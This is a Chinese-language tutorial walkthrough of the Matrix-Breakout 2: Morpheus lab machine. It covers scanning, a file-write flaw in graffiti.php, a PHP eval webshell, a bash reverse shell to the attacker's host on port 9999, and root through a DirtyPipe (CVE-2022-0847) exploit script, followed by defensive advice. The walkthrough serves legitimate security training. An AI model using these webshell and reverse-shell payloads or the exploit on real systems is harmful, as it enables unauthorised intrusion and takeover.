MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透
字数 1204 2025-08-24 10:10:13

MATRIX-BREAKOUT: 2 MORPHEUS 靶机渗透教学文档

1. 靶机概述

  • 靶机名称: MATRIX-BREAKOUT: 2 MORPHEUS
  • 难度等级: Medium-Hard
  • 下载地址: https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
  • 攻击环境: Kali Linux 2020.4
  • 网络模式: NAT

2. 信息收集阶段

2.1 确定靶机IP

使用ARP扫描确定靶机IP地址:

arp-scan -l

发现靶机IP为192.168.88.130

2.2 端口扫描

使用nmap进行全端口扫描:

nmap -p- 192.168.88.130

扫描结果:

  • 开放端口: 22(SSH)、80(HTTP)、81(HTTP)

2.3 服务探测

  • 80端口: 普通网页,无明显可利用信息
  • 81端口: 类似Tomcat的登录界面,尝试常见弱口令无果

2.4 目录扫描

使用Dirbuster进行目录扫描:

  • 字典文件: directory-list-2.3-small.txt
  • 发现重要目录: graffiti.php

3. 渗透过程

3.1 利用graffiti.php

  1. 访问graffiti.php发现提交窗口

  2. 测试XSS漏洞成功弹窗

  3. 尝试写入Webshell:

    <?php eval(@$_POST['cmd']); ?>

    发现写入到graffiti.txt文件中

  4. 通过URL直接访问写入的文件:

    http://192.168.88.130/graffiti.txt

  5. 尝试写入到可执行文件test.php中

3.2 获取Webshell

  1. 使用蚁剑连接成功获取Webshell

  2. 在根目录发现FLAG.txt,提示:

    • 用户Cypher
    • 图片/.cypher-neo.png可能有价值

  3. 下载图片cypher-neo.png

3.3 权限提升尝试

  1. 在/home目录发现:

    • Cypher用户目录(无访问权限)
    • thrinity用户目录(可访问但无有用信息)

  2. 上传反弹shell到test.php:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/9999 0>&1'");?>

  3. 开启监听后访问test.php获取交互式shell

  4. 尝试su和sudo提权均失败

3.4 分析隐藏信息

  1. 使用binwalk分析图片cypher-neo.png:

    binwalk cypher-neo.png

    发现内含zip压缩包

  2. 提取文件得到两个文件,但无法直接利用

3.5 内核漏洞提权

  1. 检查系统内核版本为5.x
  2. 使用DirtyPipe漏洞(CVE-2022-0847)提权
  3. 下载exp: 
    https://gitcode.net/mirrors/r1is/CVE-2022-0847/-/blob/main/Dirty-Pipe.sh
  4. 通过蚁剑上传exp
  5. 设置执行权限并运行: 
    chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh
  6. 提权成功,获取root权限

4. 关键点总结

  1. 目录扫描:发现graffiti.php是关键突破口
  2. 文件写入漏洞:通过graffiti.php写入Webshell
  3. 信息隐藏:图片中隐藏zip文件是重要线索
  4. 提权方法:内核5.x版本可利用DirtyPipe漏洞提权

5. 防御建议

  1. 对用户输入进行严格过滤,防止任意文件写入
  2. 及时更新系统内核,修补已知漏洞
  3. 避免在图片等文件中隐藏敏感信息
  4. 限制Web目录的可执行权限
  5. 使用最小权限原则配置服务账户
MATRIX-BREAKOUT: 2 MORPHEUS 靶机渗透教学文档 1. 靶机概述 靶机名称: MATRIX-BREAKOUT: 2 MORPHEUS 难度等级: Medium-Hard 下载地址: https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/ 攻击环境: Kali Linux 2020.4 网络模式: NAT 2. 信息收集阶段 2.1 确定靶机IP 使用ARP扫描确定靶机IP地址: 发现靶机IP为192.168.88.130 2.2 端口扫描 使用nmap进行全端口扫描: 扫描结果: 开放端口: 22(SSH)、80(HTTP)、81(HTTP) 2.3 服务探测 80端口: 普通网页,无明显可利用信息 81端口: 类似Tomcat的登录界面,尝试常见弱口令无果 2.4 目录扫描 使用Dirbuster进行目录扫描: 字典文件: directory-list-2.3-small.txt 发现重要目录: graffiti.php 3. 渗透过程 3.1 利用graffiti.php 访问graffiti.php发现提交窗口 测试XSS漏洞成功弹窗 尝试写入Webshell: 发现写入到graffiti.txt文件中 通过URL直接访问写入的文件: 尝试写入到可执行文件test.php中 3.2 获取Webshell 使用蚁剑连接成功获取Webshell 在根目录发现FLAG.txt,提示: 用户Cypher 图片/.cypher-neo.png可能有价值 下载图片cypher-neo.png 3.3 权限提升尝试 在/home目录发现: Cypher用户目录(无访问权限) thrinity用户目录(可访问但无有用信息) 上传反弹shell到test.php: 开启监听后访问test.php获取交互式shell 尝试su和sudo提权均失败 3.4 分析隐藏信息 使用binwalk分析图片cypher-neo.png: 发现内含zip压缩包 提取文件得到两个文件,但无法直接利用 3.5 内核漏洞提权 检查系统内核版本为5.x 使用DirtyPipe漏洞(CVE-2022-0847)提权 下载exp: 通过蚁剑上传exp 设置执行权限并运行: 提权成功,获取root权限 4. 关键点总结 目录扫描 :发现graffiti.php是关键突破口 文件写入漏洞 :通过graffiti.php写入Webshell 信息隐藏 :图片中隐藏zip文件是重要线索 提权方法 :内核5.x版本可利用DirtyPipe漏洞提权 5. 防御建议 对用户输入进行严格过滤,防止任意文件写入 及时更新系统内核,修补已知漏洞 避免在图片等文件中隐藏敏感信息 限制Web目录的可执行权限 使用最小权限原则配置服务账户